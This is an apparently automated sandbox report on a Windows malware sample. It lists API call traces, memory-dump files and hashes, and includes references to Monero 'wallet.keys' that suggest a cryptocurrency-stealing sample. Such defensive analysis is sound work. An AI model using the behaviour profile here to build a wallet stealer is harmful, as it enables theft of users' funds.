                                • RegQueryValueExA.ADVAPI32(?,015BF710,00000000,00000000,00000000,000000FF), ref: 00944118
                                • RegCloseKey.ADVAPI32(?), ref: 00944122
                                • lstrcat.KERNEL32(?,00000000), ref: 00944147
                                • lstrcat.KERNEL32(?,015BF758), ref: 0094415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                                • Instruction ID: 082814f6d9aceca3869486122b8837fef2b73a26c9e860e243b01101ecd16051
                                • Opcode Fuzzy Hash: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                                • Instruction Fuzzy Hash: B84136B69101086BDB14FBA0DC56FFE737DABC8300F408958B61A97191EE755BC88B92
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0094696C
                                • sscanf.NTDLL ref: 00946999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469C0
                                • ExitProcess.KERNEL32 ref: 009469DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                                • Instruction ID: 1a33a7592e363b96728b3b579c205a8d2b6f067eb85f8be201709affaeb25968
                                • Opcode Fuzzy Hash: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                                • Instruction Fuzzy Hash: A721EDB5D14208ABCF44EFE4D945AEEB7B9FF88300F04452EE40AE3250EB345605CB66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC4E0,00000000,00020119,?), ref: 00947E5E
                                • RegQueryValueExA.ADVAPI32(?,015BE8B0,00000000,00000000,000000FF,000000FF), ref: 00947E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00947E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                                • Instruction ID: 0a4364deea0058c03ef07c25006cb45593646a869f9e85812f7d82d2b35225f8
                                • Opcode Fuzzy Hash: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                                • Instruction Fuzzy Hash: 59118FB1A44209EBD714CFD4DC49F7FBBB8EB84701F104259F609A7290DB7459008BA2
                                APIs
                                • StrStrA.SHLWAPI(015BF530,?,?,?,0094140C,?,015BF530,00000000), ref: 0094926C
                                • lstrcpyn.KERNEL32(00B7AB88,015BF530,015BF530,?,0094140C,?,015BF530), ref: 00949290
                                • lstrlen.KERNEL32(?,?,0094140C,?,015BF530), ref: 009492A7
                                • wsprintfA.USER32 ref: 009492C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                                • Instruction ID: 5d1e7e5132ddff1c5b8a85b43fc11de4dad9db2425c51411496f0d2f239454a6
                                • Opcode Fuzzy Hash: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                                • Instruction Fuzzy Hash: 6401A975500108FFCB44DFE8C984EAE7BB9EB88355F108548F9199B304CA71AA40DB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                • RegCloseKey.ADVAPI32(?), ref: 009312FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                                • Instruction ID: 3e7223f5cd3ca583ca51a5c2940504197db57c7e5ce8bfc2c69a6f51b6b4bdbc
                                • Opcode Fuzzy Hash: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                                • Instruction Fuzzy Hash: 0B0131B9A40208BBDB04DFE0DC49FAEB7BCEB88701F008159FA09972C0DA709A418F51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: e37be9ef53b7a5192f11323bb2773f5269154e956a5f74cd61b27b96cf40d74b
                                • Instruction ID: 28c830c5a04a7fb22fa66de505946bfd2cbb6b0900504acea5bc134214947fb8
                                • Opcode Fuzzy Hash: e37be9ef53b7a5192f11323bb2773f5269154e956a5f74cd61b27b96cf40d74b
                                • Instruction Fuzzy Hash: 3A41F9B150175C6FDB258B24CC95FFBBBEC9F45704F1444E8E9CA86182E2719A44DF60
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00946663
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00946726
                                • ExitProcess.KERNEL32 ref: 00946755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                                • Instruction ID: 5ef11e5ac72541ba97acbc38d02fe2a1fafba77e28370ebebd7c4167d954b4bb
                                • Opcode Fuzzy Hash: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                                • Instruction Fuzzy Hash: BF3130B1C01218ABDB54EB50DC91FDE7778AF84300F404189F20967291DF746B89CF5A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E28,00000000,?), ref: 0094882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948836
                                • wsprintfA.USER32 ref: 00948850
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                                • Instruction ID: f8149925322e660cdcb3e02c22269b2b49f6234f4054d20cecd45669f7074308
                                • Opcode Fuzzy Hash: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                                • Instruction Fuzzy Hash: 7E2142B1E40204AFDB44DFD4DD45FAEBBB8FB88701F104159F609A7280CB79A941CBA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0094951E,00000000), ref: 00948D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948D62
                                • wsprintfW.USER32 ref: 00948D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                                • Instruction ID: 2b3acd3e2186c984837a1c42018760e4f07c01690cb3dfa78ae20073a18ad9bc
                                • Opcode Fuzzy Hash: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                                • Instruction Fuzzy Hash: 60E08CB0A40208BBC740DB94DC0AE6D77BCEB84702F040094FE0D87280DE719E408BA2
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0093A3FF
                                • lstrlen.KERNEL32(00000000), ref: 0093A6BC
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 0093A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                                • Instruction ID: b08f38d13b32de1721b6118215285e6a82169c1ee6d0879f59621966dee58808
                                • Opcode Fuzzy Hash: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                                • Instruction Fuzzy Hash: B3E1EE72850108AAEB19FBA4DC92FEE7338EF94304F508159F517721A1EF306A4DCB66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D481
                                • lstrlen.KERNEL32(00000000), ref: 0093D698
                                • lstrlen.KERNEL32(00000000), ref: 0093D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 0093D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
